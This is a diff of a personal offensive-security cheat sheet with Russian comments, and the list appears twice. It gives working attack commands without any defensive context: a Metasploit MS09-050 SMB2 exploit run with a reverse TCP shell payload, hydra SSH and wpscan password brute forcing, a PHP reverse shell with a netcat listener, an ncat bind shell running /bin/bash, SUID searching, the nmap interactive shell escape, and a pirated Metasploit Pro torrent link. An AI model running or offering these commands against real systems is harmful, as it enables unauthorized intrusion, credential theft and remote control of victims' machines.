evgenyigumnov · November 11, 2018 08:00
diff --git a/hackers_cmds.txt b/hackers_cmds.txt
 По nmap если хочешь узнать какие тачки живы ключ -sP ip/24

 nmap -n -v  -sS -A  IP_ADDRESS

 -sV определение версии сервисов на порту
 -O определение операционки на хосте
 -A агрессивное сканирование
 -p- сканирование всех известных портов
 -sA определение файрвола

 zmap -p 80 -o result_full.txt

 nmap -p 445 --script smb-vuln-* IP
 msfconsole
 msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
 msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set payload windows/shell/reverse_tcp
 payload => windows/shell/reverse_tcp
 msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set RHOST 192.168.188.2
 RHOST => 192.168.188.2
 msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set LHOST 192.168.188.105
 LHOST => 192.168.188.105
 msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > exploit



 netdiscover  

 nikto -h IP

 wireshark filename

 hydra -L which_one.lol.txt Pass.txt ssh://IPSEVER
 https://linuxconfig.org/ssh-password-testing-with-hydra-on-kali-linux

 wpscan —url https://site –threads 50 —wordlist passwords.txt —username elliot

 python SimpleHTTPServer 

 ./linux.sh
 https://github.com/mzet-/linux-exploit-suggester
 https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py



 gcc 348957.c -o  exl 

 php-reverse-shell.php
 http://pentestmonkey.net/tools/web-shells/php-reverse-shell
 nc -lvp 3333

 ssh_scan -t ip-address

 hashid -m skdjfhdskjfhdskfjhdsk

 find / -perm -4000 >/dev/null

 nmap —interactive
 !sh

 https://www.exploit-db.com
 https://cve.mitre.org
 https://freehackquest.com/?quests=
 Searchsploit
 metasploit
 routersploit

 генератор и поисковик страниц и скриптов на сайте
 https://tools.kali.org/web-applications/dirb

 убунту реверсшелл
 ncat --exec "/bin/bash" -l 8081 --keep-open
 ncat 127.0.0.1 8081

 На подобие плагина tamperdata в Firefox только более расширенный
 Burp suite

 Sn1per

 cobalt strike

 http://m.thepiratebay.org/torrent/16088109/Metasploit+Pro+%28Linux%29

 https://habr.com/post/234719/  статья про команды metasploit и в коментах есть полезное
 тулза поверх metasploit которой даешь айпи и она сама находит все уязвимости http://www.fastandeasyhacking.com/manual

 msfconsole -x "search exploit; exit" >exploits.txt
 cat ./exploits.txt | cut -d " " -f 4

 msfrpcd -U msf -P test -f -S -a 127.0.0.1
 msfdb init
 MSF_DATABASE_CONFIG=/home/iev/.msf4/database.yml
	По nmap если хочешь узнать какие тачки живы ключ -sP ip/24

	nmap -n -v -sS -A IP_ADDRESS

	-sV определение версии сервисов на порту
	-O определение операционки на хосте
	-A агрессивное сканирование
	-p- сканирование всех известных портов
	-sA определение файрвола

	zmap -p 80 -o result_full.txt

	nmap -p 445 --script smb-vuln-* IP
	msfconsole
	msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
	msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set payload windows/shell/reverse_tcp
	payload => windows/shell/reverse_tcp
	msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set RHOST 192.168.188.2
	RHOST => 192.168.188.2
	msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set LHOST 192.168.188.105
	LHOST => 192.168.188.105
	msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > exploit



	netdiscover

	nikto -h IP

	wireshark filename

	hydra -L which_one.lol.txt Pass.txt ssh://IPSEVER
	https://linuxconfig.org/ssh-password-testing-with-hydra-on-kali-linux

	wpscan —url https://site –threads 50 —wordlist passwords.txt —username elliot

	python SimpleHTTPServer

	./linux.sh
	https://github.com/mzet-/linux-exploit-suggester
	https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py



	gcc 348957.c -o exl

	php-reverse-shell.php
	http://pentestmonkey.net/tools/web-shells/php-reverse-shell
	nc -lvp 3333

	ssh_scan -t ip-address

	hashid -m skdjfhdskjfhdskfjhdsk

	find / -perm -4000 >/dev/null

	nmap —interactive
	!sh

	https://www.exploit-db.com
	https://cve.mitre.org
	https://freehackquest.com/?quests=
	Searchsploit
	metasploit
	routersploit

	генератор и поисковик страниц и скриптов на сайте
	https://tools.kali.org/web-applications/dirb

	убунту реверсшелл
	ncat --exec "/bin/bash" -l 8081 --keep-open
	ncat 127.0.0.1 8081

	На подобие плагина tamperdata в Firefox только более расширенный
	Burp suite

	Sn1per

	cobalt strike

	http://m.thepiratebay.org/torrent/16088109/Metasploit+Pro+%28Linux%29

	https://habr.com/post/234719/ статья про команды metasploit и в коментах есть полезное
	тулза поверх metasploit которой даешь айпи и она сама находит все уязвимости http://www.fastandeasyhacking.com/manual

	msfconsole -x "search exploit; exit" >exploits.txt
	cat ./exploits.txt \| cut -d " " -f 4

	msfrpcd -U msf -P test -f -S -a 127.0.0.1
	msfdb init
	MSF_DATABASE_CONFIG=/home/iev/.msf4/database.yml